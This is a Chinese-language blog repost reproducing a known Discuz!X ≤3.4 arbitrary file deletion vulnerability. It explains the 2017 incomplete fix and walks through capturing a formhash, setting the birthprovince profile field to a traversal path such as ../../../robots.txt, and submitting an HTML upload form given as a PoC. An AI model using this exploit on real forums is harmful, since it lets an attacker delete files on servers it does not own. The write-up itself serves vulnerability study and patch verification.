前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Discuz!X ≤3.4 任意文件删除漏洞复现

Discuz!X ≤3.4 任意文件删除漏洞复现

作者头像
渗透攻击红队
发布2019-11-19 22:34:51
1.9K0
发布2019-11-19 22:34:51
举报
文章被收录于专栏:漏洞知识库漏洞知识库

Discuz!X ≤3.4 任意文件删除漏洞

Discuz!X社区软件,是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

2017年9月29日,Discuz!修复了一个安全问题2用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。

2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞3,漏洞编号ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。

经过分析确认,原有的利用方式已经被修复,添加了对属性的formtype判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他unlink条件,实现任意文件删除漏洞。

漏洞复现

首先访问我们的robots.txt:(验证是否存在)

接着是注册了一个liuwx,然后来到个人设置页面找到自己的formhash:133dd9cc

请求这个页面保存然后抓包:

http://192.168.1.104/home.php?mod=spacecp&ac=profile&op=base

来到这个参数:birthprovince,这个参数填写的是你要删除的文件,以robots.txt为例:

接着Forward

提交成功后,从上图可以看到出生地会显示../../../robots.txt,也就是说明它待会要凉了咯~

漏洞POC

代码语言:javascript
复制
<body>
    <form action="http://[这里填写网站域名]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[这里填写刚刚得到的hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

把以上POC保存为*.html格式,然后打开上传任意一张图片:

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Discuz!X ≤3.4 任意文件删除漏洞
  • 漏洞复现
    • 漏洞POC
    相关产品与服务
    Discuz!
    Discuz! 是全球领先的论坛社区应用系统,自2001年6月面世以来,服务超过300多万网站用户案例。现在,借助 Discuz! ,您不仅可以使用搭建传统的社区论坛,更可轻易的构建面向移动互联网时代的私域流量和社交圈子类的应用,并快速启动业务。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档